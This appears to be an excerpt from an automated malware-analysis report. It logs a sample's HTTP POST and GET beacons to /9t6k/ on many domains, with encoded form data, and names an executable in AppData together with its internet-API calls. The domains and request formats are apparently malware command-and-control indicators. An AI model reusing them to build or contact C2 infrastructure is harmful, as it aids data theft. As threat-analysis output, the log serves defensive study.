Source: global traffic	HTTP traffic detected: POST /9t6k/ HTTP/1.1Host: www.pocketspacer.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.pocketspacer.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.pocketspacer.com/9t6k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 52 66 6c 68 3d 6b 6b 4d 7a 63 57 4d 6c 7e 7a 51 31 58 7a 32 73 68 76 6f 77 4a 69 46 36 38 30 4b 51 61 42 54 5a 30 4d 7e 35 6b 43 7e 63 6c 6f 62 4a 51 35 7a 78 38 57 38 44 75 71 43 35 4c 42 53 61 6d 6b 30 4e 76 49 51 32 6e 46 4a 4f 53 61 73 56 7a 66 33 61 53 4c 66 50 56 57 75 6a 57 37 4d 68 6a 41 67 30 6e 35 4a 74 4d 50 42 6b 42 7a 4f 73 49 57 7e 4e 66 52 71 53 71 75 70 41 43 4b 42 4c 54 77 31 70 62 47 4a 76 30 68 34 59 64 46 79 2d 6f 75 4f 55 51 76 74 39 59 68 7a 2d 78 37 78 44 76 42 55 76 38 34 30 63 69 37 7e 78 4e 6f 78 44 70 51 54 75 46 6e 62 6b 38 61 4b 35 59 67 6a 68 42 4d 76 75 74 6e 78 51 34 55 62 49 6b 69 51 6b 4b 7a 43 75 43 33 45 33 4f 47 6e 33 4d 6b 50 46 4d 54 36 68 7e 43 47 4e 38 62 59 6b 55 49 47 6d 4b 72 41 38 62 34 4f 71 53 6a 37 59 75 4b 36 61 5a 32 71 58 4b 39 4c 5f 51 42 6d 61 7a 58 28 78 45 45 6c 42 78 33 38 6d 47 55 65 41 4b 4a 38 67 4d 42 57 42 31 53 4e 7a 56 6a 4b 7a 77 76 76 37 28 51 73 57 6d 72 6f 61 64 34 62 69 4b 6b 41 68 47 69 41 41 79 38 7a 35 33 51 66 61 62 7a 4d 6e 74 4c 4f 73 39 57 65 53 52 63 51 58 70 61 53 50 35 6f 32 2d 37 41 78 66 6a 43 63 37 34 6d 6f 6a 51 37 61 36 41 69 6c 4a 35 48 41 4d 37 78 70 63 77 51 61 53 57 58 35 4b 6d 39 30 34 28 37 53 4a 32 77 35 32 7a 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: URflh=kkMzcWMl~zQ1Xz2shvowJiF680KQaBTZ0M~5kC~clobJQ5zx8W8DuqC5LBSamk0NvIQ2nFJOSasVzf3aSLfPVWujW7MhjAg0n5JtMPBkBzOsIW~NfRqSqupACKBLTw1pbGJv0h4YdFy-ouOUQvt9Yhz-x7xDvBUv840ci7~xNoxDpQTuFnbk8aK5YgjhBMvutnxQ4UbIkiQkKzCuC3E3OGn3MkPFMT6h~CGN8bYkUIGmKrA8b4OqSj7YuK6aZ2qXK9L_QBmazX(xEElBx38mGUeAKJ8gMBWB1SNzVjKzwvv7(QsWmroad4biKkAhGiAAy8z53QfabzMntLOs9WeSRcQXpaSP5o2-7AxfjCc74mojQ7a6AilJ5HAM7xpcwQaSWX5Km904(7SJ2w52zQ).
Source: global traffic	HTTP traffic detected: POST /9t6k/ HTTP/1.1Host: www.cia3mega.infoConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.cia3mega.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.cia3mega.info/9t6k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 52 66 6c 68 3d 7a 72 6e 4f 51 6d 4b 54 6b 48 79 41 54 68 69 64 55 4c 59 7a 77 65 35 64 33 4a 42 5a 36 52 6c 4b 6a 6b 74 70 55 47 51 52 4c 43 55 37 33 35 46 61 4c 41 73 47 30 74 4f 54 65 75 61 46 53 37 77 39 59 73 56 77 36 75 65 4e 47 5f 50 4d 6b 53 6a 31 6d 56 62 65 66 47 54 64 38 76 32 5f 62 4c 30 43 37 35 47 7a 4f 67 73 53 45 30 33 62 5a 42 48 79 7a 7a 62 56 77 6b 41 6b 68 4c 52 75 4c 6a 62 55 6f 48 6e 51 43 59 33 6c 72 70 6f 67 49 73 30 49 67 7a 76 37 32 6c 4d 38 75 49 77 47 72 50 6b 4b 6c 6f 52 52 59 75 4a 6a 73 77 45 51 33 4b 56 74 45 49 6d 55 39 58 54 6c 54 76 45 74 28 74 47 44 54 65 4c 2d 7a 37 61 62 61 57 4e 56 76 4e 45 45 46 44 55 4d 52 74 59 70 45 50 68 42 32 51 72 6e 6b 79 30 68 74 77 4b 75 6f 4c 6a 4c 42 33 4d 39 35 57 6e 76 6f 75 45 4c 72 6e 6e 4d 63 79 75 2d 52 44 65 31 46 68 52 35 59 52 4e 5a 6d 5f 7e 54 5a 4c 66 4a 55 77 64 70 73 4c 6b 42 32 44 61 63 46 4b 76 46 75 51 34 67 71 4d 6c 70 68 6b 75 47 37 6d 75 76 4c 44 75 49 35 56 4f 35 28 72 6b 39 6f 76 46 6a 7e 6d 65 4c 6e 68 4c 51 44 6d 47 73 75 72 32 4c 59 66 7e 72 69 35 64 35 35 46 4f 61 4c 37 4a 42 64 5f 6d 76 34 6e 4e 6e 74 6c 6d 34 43 39 6e 6d 47 2d 44 45 6a 64 59 36 70 65 31 54 43 58 76 57 42 2d 73 42 55 33 53 57 43 30 37 61 28 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: URflh=zrnOQmKTkHyAThidULYzwe5d3JBZ6RlKjktpUGQRLCU735FaLAsG0tOTeuaFS7w9YsVw6ueNG_PMkSj1mVbefGTd8v2_bL0C75GzOgsSE03bZBHyzzbVwkAkhLRuLjbUoHnQCY3lrpogIs0Igzv72lM8uIwGrPkKloRRYuJjswEQ3KVtEImU9XTlTvEt(tGDTeL-z7abaWNVvNEEFDUMRtYpEPhB2Qrnky0htwKuoLjLB3M95WnvouELrnnMcyu-RDe1FhR5YRNZm_~TZLfJUwdpsLkB2DacFKvFuQ4gqMlphkuG7muvLDuI5VO5(rk9ovFj~meLnhLQDmGsur2LYf~ri5d55FOaL7JBd_mv4nNntlm4C9nmG-DEjdY6pe1TCXvWB-sBU3SWC07a(A).
Source: global traffic	HTTP traffic detected: POST /9t6k/ HTTP/1.1Host: www.sportsbookmatcher.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.sportsbookmatcher.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.sportsbookmatcher.com/9t6k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 52 66 6c 68 3d 4c 36 6c 46 69 57 39 4b 57 6e 51 57 4c 39 6c 62 63 42 37 51 54 59 4a 34 6c 79 6c 78 4c 51 75 72 37 48 74 57 38 52 39 37 6d 61 69 33 67 78 46 5f 57 47 79 68 6d 4d 65 33 51 2d 53 61 5a 53 4a 31 70 55 44 34 57 39 41 64 56 58 36 41 32 63 37 71 7e 43 77 73 31 37 55 43 78 43 61 5f 48 6f 4a 79 54 51 52 37 48 79 6a 67 4b 30 59 73 59 43 45 2d 47 56 31 35 6e 74 75 49 72 54 48 6c 65 66 4f 55 39 66 4d 47 37 72 75 67 36 77 35 54 4d 59 28 73 6b 4d 62 58 6a 59 45 30 6e 61 51 52 61 30 58 42 72 43 44 6a 73 64 71 4b 57 39 62 32 37 72 32 48 57 54 33 4d 69 6b 76 5a 71 50 66 6e 52 64 30 64 35 6d 47 77 79 69 39 4e 7a 50 74 61 76 49 6d 36 4f 42 41 71 51 56 44 56 77 57 4a 7a 28 42 63 6a 49 63 7a 47 75 46 70 38 50 4e 45 56 7e 61 70 61 74 4e 56 57 71 39 70 57 4c 48 58 38 50 37 78 62 77 44 75 34 56 50 56 2d 4b 75 76 6b 63 64 32 69 77 50 42 62 37 49 70 64 75 32 69 5f 43 55 57 59 5a 51 35 4a 6d 77 68 57 54 4f 79 58 28 31 51 5a 35 5f 47 6f 52 65 53 5a 55 65 76 74 52 78 79 67 55 62 79 49 46 4f 48 31 4b 64 53 52 4e 47 63 30 36 46 45 48 50 72 4a 53 33 6a 4f 49 76 49 70 5f 6d 6c 49 79 77 68 69 4c 4d 33 71 70 4e 7a 72 35 77 7a 62 36 48 48 41 43 36 46 4c 4f 7e 75 7a 61 35 2d 58 63 6d 46 39 52 39 48 75 55 4b 75 45 4c 44 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: URflh=L6lFiW9KWnQWL9lbcB7QTYJ4lylxLQur7HtW8R97mai3gxF_WGyhmMe3Q-SaZSJ1pUD4W9AdVX6A2c7q~Cws17UCxCa_HoJyTQR7HyjgK0YsYCE-GV15ntuIrTHlefOU9fMG7rug6w5TMY(skMbXjYE0naQRa0XBrCDjsdqKW9b27r2HWT3MikvZqPfnRd0d5mGwyi9NzPtavIm6OBAqQVDVwWJz(BcjIczGuFp8PNEV~apatNVWq9pWLHX8P7xbwDu4VPV-Kuvkcd2iwPBb7Ipdu2i_CUWYZQ5JmwhWTOyX(1QZ5_GoReSZUevtRxygUbyIFOH1KdSRNGc06FEHPrJS3jOIvIp_mlIywhiLM3qpNzr5wzb6HHAC6FLO~uza5-XcmF9R9HuUKuELDQ).
Source: global traffic	HTTP traffic detected: POST /9t6k/ HTTP/1.1Host: www.makingdoathome.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.makingdoathome.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.makingdoathome.com/9t6k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 52 66 6c 68 3d 4d 59 68 34 39 6a 61 39 6f 38 63 76 6d 39 62 6d 4f 6d 4d 36 76 64 6e 56 50 4d 63 71 64 37 6c 35 31 72 76 6b 59 73 7a 49 33 57 6d 6d 53 7a 4f 50 28 41 4e 71 68 33 6b 36 6d 33 54 5a 4c 52 5a 41 5a 4b 51 37 52 4d 6a 6a 38 78 54 6d 37 79 70 51 28 69 74 49 78 63 58 37 46 56 76 59 38 38 66 6f 37 6d 36 6a 53 61 68 36 51 51 4c 64 33 4c 4a 5f 4f 73 75 32 44 56 56 44 46 37 6a 57 6a 30 6d 38 51 74 59 6b 36 44 6e 65 6e 35 6c 76 28 41 70 79 59 79 4e 64 69 74 56 68 42 61 48 61 70 6a 52 43 58 59 53 49 7e 45 44 61 4b 6b 57 75 37 35 4f 71 47 6e 50 35 28 4d 46 41 30 31 4e 36 50 69 44 52 61 30 48 72 48 6a 43 39 6f 33 4b 58 4f 65 7e 7a 6b 70 45 74 64 30 33 48 68 68 4b 6b 69 65 6a 4b 37 66 7e 61 4d 6e 33 55 77 6b 6b 4d 63 42 4c 65 55 59 48 43 55 53 6e 55 69 67 50 42 6b 57 4a 70 4c 76 52 50 35 6a 72 57 79 79 37 56 75 65 45 7a 45 6d 68 30 73 6a 39 62 44 32 73 79 6d 4e 58 55 37 4c 46 49 78 4f 30 33 37 62 73 7a 79 43 35 31 69 39 7e 72 79 77 30 57 69 4d 67 49 78 67 43 37 4a 61 76 70 66 4a 4e 7a 76 6a 77 5a 44 37 72 61 7a 4e 6f 4d 4e 46 64 4c 34 6c 65 34 51 78 66 30 43 4e 6a 52 32 62 36 76 6d 50 6f 49 38 5a 50 57 39 72 58 41 71 52 75 37 4b 73 4b 51 52 35 4a 6d 4a 6d 67 79 55 56 30 49 75 57 4a 72 55 78 51 76 36 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: URflh=MYh49ja9o8cvm9bmOmM6vdnVPMcqd7l51rvkYszI3WmmSzOP(ANqh3k6m3TZLRZAZKQ7RMjj8xTm7ypQ(itIxcX7FVvY88fo7m6jSah6QQLd3LJ_Osu2DVVDF7jWj0m8QtYk6Dnen5lv(ApyYyNditVhBaHapjRCXYSI~EDaKkWu75OqGnP5(MFA01N6PiDRa0HrHjC9o3KXOe~zkpEtd03HhhKkiejK7f~aMn3UwkkMcBLeUYHCUSnUigPBkWJpLvRP5jrWyy7VueEzEmh0sj9bD2symNXU7LFIxO037bszyC51i9~ryw0WiMgIxgC7JavpfJNzvjwZD7razNoMNFdL4le4Qxf0CNjR2b6vmPoI8ZPW9rXAqRu7KsKQR5JmJmgyUV0IuWJrUxQv6A).
Source: global traffic	HTTP traffic detected: POST /9t6k/ HTTP/1.1Host: www.rodgroup.netConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.rodgroup.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.rodgroup.net/9t6k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 52 66 6c 68 3d 78 58 33 30 78 53 34 72 49 4c 54 5f 4d 79 35 71 74 4c 37 2d 6f 48 6e 71 39 32 4b 4d 59 69 57 75 52 59 55 6e 33 4f 5a 75 39 61 42 52 43 49 5a 36 37 5a 76 50 6d 32 54 62 42 6d 46 4b 49 2d 4d 31 79 71 66 52 5a 55 56 4f 4e 41 41 69 74 51 4a 71 6a 44 43 35 7a 4e 54 41 28 72 6e 43 70 76 64 62 63 79 78 58 6f 43 43 61 66 77 52 79 71 67 6d 50 6e 71 78 6a 35 6d 57 51 6c 58 37 74 54 50 69 62 71 77 35 32 4a 39 61 6f 58 33 31 34 6c 62 28 65 53 73 69 34 6a 45 49 2d 39 66 50 38 37 58 71 2d 57 6b 71 39 69 4d 6c 4b 46 78 53 30 53 72 32 57 7a 43 56 64 38 4d 54 65 53 32 66 31 45 72 66 44 37 57 59 71 34 4c 50 4d 57 70 66 63 47 59 44 73 36 6d 47 71 48 30 68 6f 64 37 71 44 41 4f 52 5a 52 47 65 76 6c 53 41 51 71 6d 39 30 4f 51 33 56 38 72 38 53 42 6a 52 56 51 4c 5a 57 54 65 45 46 6f 53 77 61 52 5a 38 52 64 50 42 33 43 6b 52 48 7a 6f 78 56 73 33 62 79 57 73 56 66 65 57 53 35 6d 79 55 46 76 6e 71 77 6d 49 69 31 77 63 6c 54 4e 4f 34 31 7a 4a 35 62 77 71 31 50 4e 30 52 56 70 5f 4d 59 59 4f 67 45 76 4a 79 52 43 6d 68 46 51 78 66 57 38 46 50 65 73 31 65 77 48 73 67 76 7e 6d 46 75 79 41 79 70 46 5f 79 64 71 48 31 47 39 2d 67 68 71 65 6d 37 63 74 57 44 39 76 67 67 4d 77 38 70 79 46 6c 52 55 6d 63 5f 68 31 45 75 78 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: URflh=xX30xS4rILT_My5qtL7-oHnq92KMYiWuRYUn3OZu9aBRCIZ67ZvPm2TbBmFKI-M1yqfRZUVONAAitQJqjDC5zNTA(rnCpvdbcyxXoCCafwRyqgmPnqxj5mWQlX7tTPibqw52J9aoX314lb(eSsi4jEI-9fP87Xq-Wkq9iMlKFxS0Sr2WzCVd8MTeS2f1ErfD7WYq4LPMWpfcGYDs6mGqH0hod7qDAORZRGevlSAQqm90OQ3V8r8SBjRVQLZWTeEFoSwaRZ8RdPB3CkRHzoxVs3byWsVfeWS5myUFvnqwmIi1wclTNO41zJ5bwq1PN0RVp_MYYOgEvJyRCmhFQxfW8FPes1ewHsgv~mFuyAypF_ydqH1G9-ghqem7ctWD9vggMw8pyFlRUmc_h1Euxw).

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe

Code function: 5_2_040FD37C InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,

5_2_040FD37C

Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=WRaEwe7grAm8RcFyQBNRvy9NVNi7wOvDLX3hizJdol6io43A3OIdw5NSblbyY8qTqmIe&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.higherthan75.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=73SmHps+05HxyxR+Sls8P85g8AMVj2xb8ZN5KGQQxUczRwjFANvvf8FlZWdGNK7+ujWZ&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.renabbeauty.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=5YbgiWOMvK10e+D+Ti4oKvmTwuSwaKBdeKNLrkVAsRRvF5LwbTMOesGYedm1bG3cJWIa&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.ahomedokita.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=W7vyYWXucRnMwWrTc6z6xJ7ly1Aaea5WWr62fhSAhoSHJNEqGWpe7zCBU0dcNM6Zeho8&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.dainikamarsomoy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=AqHI0+MX2ftrVe3DEiYBNVYhM67Z+qKer8sV+OvuybcJEoEJXTUx/oN346XCugNKhu9g&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.kingdomwinecommunity.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=rm4JCycf8jgnKzL2gaZxJFxF+HyMTTLQtqzA4xmgqdXyWq3yu1ARpOH0ZAK4rmQWxcAt&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.pocketspacer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=E4R/8wd6fgEkWdVXGUezTNl/uDJNCiSgqhAFvmJDlfqfpwFCHVrHgZ/vPMmlVzFxpgLt&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.sportsbookmatcher.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=+VDOv2YqGr3HQyUjxvr4ySDa222PNTvrG/MhsshnzvB0EZlKybOlzjmZT3Iubthnocji&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.rodgroup.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=tVqqbIXu9nslI248AUXCUxr0o0zC9i0c8STc7UOUyN+2mFy87kkATVtNwFSSPJTjqgHk&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.buttsliders.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=kTde6z/9FBgibCJh75hFV8EYWatL1OQ/rhfr5oU2UZBR6XWcBOIn723UV5Uezh3ZQ4ot&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.thanksforlove.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=b8EUNPE+oYf5M4MWpXscm/Bt3xsjLt8hNenJJ3DjxXNjYfRDWC0pztruTX9IDl5bQG1I&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.outtheframecustoms.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=wzqvVRf3v7wWdKVsEzaCYluZDwjvGR+wpj+mt/yOJMnJEVZY6i5f9AVoqOYOhCkuGFts&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.theyolokart.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=WRaEwe7grAm8RcFyQBNRvy9NVNi7wOvDLX3hizJdol6io43A3OIdw5NSblbyY8qTqmIe&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.higherthan75.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=73SmHps+05HxyxR+Sls8P85g8AMVj2xb8ZN5KGQQxUczRwjFANvvf8FlZWdGNK7+ujWZ&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.renabbeauty.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=5YbgiWOMvK10e+D+Ti4oKvmTwuSwaKBdeKNLrkVAsRRvF5LwbTMOesGYedm1bG3cJWIa&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.ahomedokita.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=W7vyYWXucRnMwWrTc6z6xJ7ly1Aaea5WWr62fhSAhoSHJNEqGWpe7zCBU0dcNM6Zeho8&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.dainikamarsomoy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=AqHI0+MX2ftrVe3DEiYBNVYhM67Z+qKer8sV+OvuybcJEoEJXTUx/oN346XCugNKhu9g&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.kingdomwinecommunity.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=rm4JCycf8jgnKzL2gaZxJFxF+HyMTTLQtqzA4xmgqdXyWq3yu1ARpOH0ZAK4rmQWxcAt&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.pocketspacer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=E4R/8wd6fgEkWdVXGUezTNl/uDJNCiSgqhAFvmJDlfqfpwFCHVrHgZ/vPMmlVzFxpgLt&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.sportsbookmatcher.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=DaVCjFuxi8IQ0KSmZmVVzdfbFs8HKa1S3sC5D9GQ7HSGSXmO4QACkgMj7QCmBzxlGckN&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.makingdoathome.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=+VDOv2YqGr3HQyUjxvr4ySDa222PNTvrG/MhsshnzvB0EZlKybOlzjmZT3Iubthnocji&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.rodgroup.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=tVqqbIXu9nslI248AUXCUxr0o0zC9i0c8STc7UOUyN+2mFy87kkATVtNwFSSPJTjqgHk&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.buttsliders.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=kTde6z/9FBgibCJh75hFV8EYWatL1OQ/rhfr5oU2UZBR6XWcBOIn723UV5Uezh3ZQ4ot&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.thanksforlove.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=b8EUNPE+oYf5M4MWpXscm/Bt3xsjLt8hNenJJ3DjxXNjYfRDWC0pztruTX9IDl5bQG1I&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.outtheframecustoms.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=wzqvVRf3v7wWdKVsEzaCYluZDwjvGR+wpj+mt/yOJMnJEVZY6i5f9AVoqOYOhCkuGFts&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.theyolokart.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=WRaEwe7grAm8RcFyQBNRvy9NVNi7wOvDLX3hizJdol6io43A3OIdw5NSblbyY8qTqmIe&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.higherthan75.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=73SmHps+05HxyxR+Sls8P85g8AMVj2xb8ZN5KGQQxUczRwjFANvvf8FlZWdGNK7+ujWZ&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.renabbeauty.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=5YbgiWOMvK10e+D+Ti4oKvmTwuSwaKBdeKNLrkVAsRRvF5LwbTMOesGYedm1bG3cJWIa&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.ahomedokita.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=W7vyYWXucRnMwWrTc6z6xJ7ly1Aaea5WWr62fhSAhoSHJNEqGWpe7zCBU0dcNM6Zeho8&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.dainikamarsomoy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=AqHI0+MX2ftrVe3DEiYBNVYhM67Z+qKer8sV+OvuybcJEoEJXTUx/oN346XCugNKhu9g&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.kingdomwinecommunity.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=rm4JCycf8jgnKzL2gaZxJFxF+HyMTTLQtqzA4xmgqdXyWq3yu1ARpOH0ZAK4rmQWxcAt&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.pocketspacer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=8pT0OCjpukmgT2/VEONoh7Jhw41r4itI2gwuQkgKFiQj+4gEMjoX0rzJNNSQA5Q1OcRE&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.cia3mega.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=E4R/8wd6fgEkWdVXGUezTNl/uDJNCiSgqhAFvmJDlfqfpwFCHVrHgZ/vPMmlVzFxpgLt&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.sportsbookmatcher.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=DaVCjFuxi8IQ0KSmZmVVzdfbFs8HKa1S3sC5D9GQ7HSGSXmO4QACkgMj7QCmBzxlGckN&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.makingdoathome.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=+VDOv2YqGr3HQyUjxvr4ySDa222PNTvrG/MhsshnzvB0EZlKybOlzjmZT3Iubthnocji&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.rodgroup.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=tVqqbIXu9nslI248AUXCUxr0o0zC9i0c8STc7UOUyN+2mFy87kkATVtNwFSSPJTjqgHk&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.buttsliders.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=kTde6z/9FBgibCJh75hFV8EYWatL1OQ/rhfr5oU2UZBR6XWcBOIn723UV5Uezh3ZQ4ot&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.thanksforlove.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=b8EUNPE+oYf5M4MWpXscm/Bt3xsjLt8hNenJJ3DjxXNjYfRDWC0pztruTX9IDl5bQG1I&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.outtheframecustoms.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=wzqvVRf3v7wWdKVsEzaCYluZDwjvGR+wpj+mt/yOJMnJEVZY6i5f9AVoqOYOhCkuGFts&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.theyolokart.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=WRaEwe7grAm8RcFyQBNRvy9NVNi7wOvDLX3hizJdol6io43A3OIdw5NSblbyY8qTqmIe&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.higherthan75.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
